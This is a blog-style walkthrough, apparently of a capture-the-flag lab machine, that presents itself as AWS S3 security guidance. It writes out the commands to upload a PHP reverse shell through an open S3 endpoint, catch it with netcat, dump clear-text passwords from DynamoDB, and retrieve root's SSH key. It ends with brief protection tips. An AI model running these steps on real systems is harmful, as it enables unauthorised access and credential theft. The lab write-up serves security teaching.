Amazon AWS anti-data-leak guidance 2021
The AWS S3 cloud service now has 100 trillion objects in its storage, and Amazon claims that the objects stored there have 99.99999999% durability. Huge companies like Netflix, Twitch, and BBC use Amazon S3 Services to store their data on the cloud.
In this article, we will:
- analyse vulnerabilities regarding the S3 buckets
- show in detail how can hack a machine running AWS services
- list some protection measures recommended by Amazon and us to keep your data safe on the cloud.
Table of Contents
Disclaimer: The attack replicated in this article was performed on a machine in a safe environment, made especially for this. Please do not attack anyone without their written consent.
Amazon S3 Bucket Vulnerability
I will show you how I have replicated an attack by using the file upload feature of Amazon S3.
I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:
sudo apt install awscli
I then attempted to connect to a custom endpoint and list the files in the server:
aws –endpoint-url http://s3.bucket.htb s3 ls
However, credentials need to be configured to connect. They can be set with the following command:
When prompted, if you leave every field blank, it does not work. But we can use invalid keys (and input any data), and it will still work.
We issue the previous command, and it works; we are connected to the endpoint.
Now we will use the file upload feature of Amazon AWS by uploading a reverse shell that connects back to us.
A reverse shell is a command or a collection of commands that establish a connection from a remote machine to our machine. We are making the target machine connect to us by injecting a file that executes these commands.
Using Kali Linux, such reverse shells are already on your machine, in the directory /usr/share/laudanum/php. If you are on a different Linux flavor, you can download the reverse shell from PentestMonkey.
However, when using this file, you must change your IP and your port. You can find your IP by using ifconfig. I used port 443. You can see comments next to the parameters that you have to change (or you can use CTRL+F to find them fast).
We then upload the file on the server by using the cp (copy) command.
aws –endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php
You should get a prompt back with the upload location.
We set up the Netcat listener. The machine will connect to us on port 443, so we must use Netcat to receive the connection.
sudo nc -nlvp 443
We now browse the website to execute our shell. To find our injected file, we type the website’s URL and then a ‘/’ and the file name. We uploaded it under the name shell.php.
After we browse it, we check in the terminal and see that we have a shell.
We can now type commands on the machine hosting the server.
We are a low privilege user, which is www-data. However, this does not mean that the vulnerability cannot have a huge impact. There are many ways in which we can escalate our privileges.
Before continuing with this shell, I will show you some other commands you can perform on the AWS server that exposes a significant vulnerability.
Amazon uses DynamoDB. We can use this information to find more about the database. Using the following command, we can find the name of tables in the database.
aws --endpoint-url=http://s3.bucket.htb dynamodb describe-table --table-name use
We see that the database contains the table “users”. Enumerating further, we find the users and the clear-text passwords.
aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users
Going back to our initial shell, we need to find the users of the machine. They don't need to be identical to the ones in the database (however, password re-usage can happen, so the found credentials can still be valid).
ls -la /home
We see the user roy. To have a more stable shell and show you how to use SSH on the machine, we will connect with SSH to try all the passwords in the database. The last one works, and we are connected as roy on the machine!
Now, to gain full control of the system, we use the AWS server one more time.
We create the table alerts:
aws dynamodb create-table \ --table-name alerts \ --attribute-definitions \ AttributeName=title,AttributeType=S \ AttributeName=data,AttributeType=S \ --key-schema \ AttributeName=title,KeyType=HASH \ AttributeName=data,KeyType=RANGE \ --provisioned-throughput \ ReadCapacityUnits=10,WriteCapacityUnits=5 \ --endpoint-url http://s3.bucket.htb
That will retrieve the root’s SSH key from the directory /root/.ssh.
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000
And then we use curl to download the root’s key and listen on port 8000.
curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf
We open the result.pdf and find the RSA key.
We move the key in a file called id RSA and set appropriate permissions for the file to connect with SSH.
chmod 400 id_rsa
ssh [email protected] -i id_rsa
And we have gained full access to the machine, using Amazon AWS S3 bucket vulnerabilities.
What is Amazon S3?
Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) built to offer object storage on the Cloud. Amazon promises:
- data availability
A Bucket is a resource available on an AWS S3 server. It is a container, like a folder, that stores objects (which are defined by files and their metadata).
According to a trusted source, AWS’s top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.
To protect your AWS S3 bucket and disallow intruders’ access to your storage space, you can use the following features provided by Amazon:
- Block public access
- Use Bucket ACLs (Access Control Lists) to restrict read, write, access permissions from ‘Everyone’
- Scan your Amazon S3 buckets with the ListBuckets API
- Implement policies that do not allow everyone to access and perform actions on the bucket (note: the wildcard “*” means everyone)
- Encrypt your data. Amazon supports HTTPS, which encrypts data in transit.
I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your private data safe!
Considering the demonstration shown in this article, you should take great care of your cloud storage and take all the security measures that Amazon & I recommend.
It's important because today, I demonstrated how the machine hosting the AWS server could be compromised, and the damage can go further to your or your company’s storage.
If you use the Amazon AWS S3 services, please let me know if you have heard of any other vulnerabilities and what protection measures you take to keep your private data safe?
Stay tuned and watch around!
Your email address will not be published. Required fields are marked